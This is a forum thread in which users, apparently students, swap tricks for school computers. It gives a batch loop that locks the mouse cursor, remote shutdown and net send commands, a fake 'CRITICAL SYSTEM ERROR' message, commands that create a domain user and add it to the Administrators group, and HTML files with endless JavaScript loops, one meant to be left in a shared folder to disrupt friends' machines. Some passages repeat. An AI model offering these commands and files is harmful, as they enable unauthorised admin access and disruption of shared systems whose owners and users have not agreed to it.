Not if you made the .bat files at home.shmagoogin77 wrote:they would see you if you wrote it in notpad 2MM007 wrote:But then they see what you type, remember?shmagoogin77 wrote:you can also use the command promt
(its easier)
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It is actually:
It turns screen printing off with "@echo off" and places a label or marker at ":1", then uses the app rundll32.exe to run user32.dll as an app. The comma specifies that it will goto the function "SetCursorPos" within user32, and the "0:0" are the parameters. Then, "goto 1" tells it to go back to label 1 and repeat. End is unnessessary in this operation, but completes it properly. The operation as a whole will move the cursor to the specified position on the screen, and because it repeats continuously, it holds the mouse at that position. This must be made into a batch program to work properly. I'd suggest you give it a try, because it is a good learning experience. After you run the batch, press CTRL+ALT+DEL and use the arrow keys to get to "C:\Windows\System32\cmd" in the list, then press ALT+E to end the task, giving you control of your mouse once again.
The co-ordinates that you set at 0:0 are supposed to determine mouse position, but my computer sticks it in bottom right corner.
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@echo off
:1
rundll32 user32,SetCursorPos 0:0
goto 1
endThe co-ordinates that you set at 0:0 are supposed to determine mouse position, but my computer sticks it in bottom right corner.

Crap, you guys are lucky, my computers at school are really really secure, and it sucks!
Heres some stuff that ive tried though.
shutdown -r -t 00 -m \\compname (this dosnt work for me since my computer admin say me use it. Luckily, he wanted me to explore more exploits and tell him when I find them.)
net send * message
net send compname message
net user name password /add /domain
net localgroup Administrators name /add
Stuff like that. Also ive had a bit of fun with javascript.
Put this in notepad and save it as something like donotclick.html
That spaws ~ 60 windows in ie (~60 is the max number of processes ie/windows can handle)
Or try this:
Put it in a shared folder and watch as all your friends computers go crazy.
Heres some stuff that ive tried though.
shutdown -r -t 00 -m \\compname (this dosnt work for me since my computer admin say me use it. Luckily, he wanted me to explore more exploits and tell him when I find them.)
net send * message
net send compname message
net user name password /add /domain
net localgroup Administrators name /add
Stuff like that. Also ive had a bit of fun with javascript.
Put this in notepad and save it as something like donotclick.html
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<html>
<body>
<script>
while (1) {open(self.location};
</script>
</body>
</html>Or try this:
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<html>
<body>
<script>
while (1) {alert("I told you not to click this file!")};
</script>
</body>
</html>Is there anything like net send that you cna do on macs? Cause thats all my school has
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It was a BAT file!
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net send comp CRITICAL SYSTEM ERROR. Press ENTER to continue."
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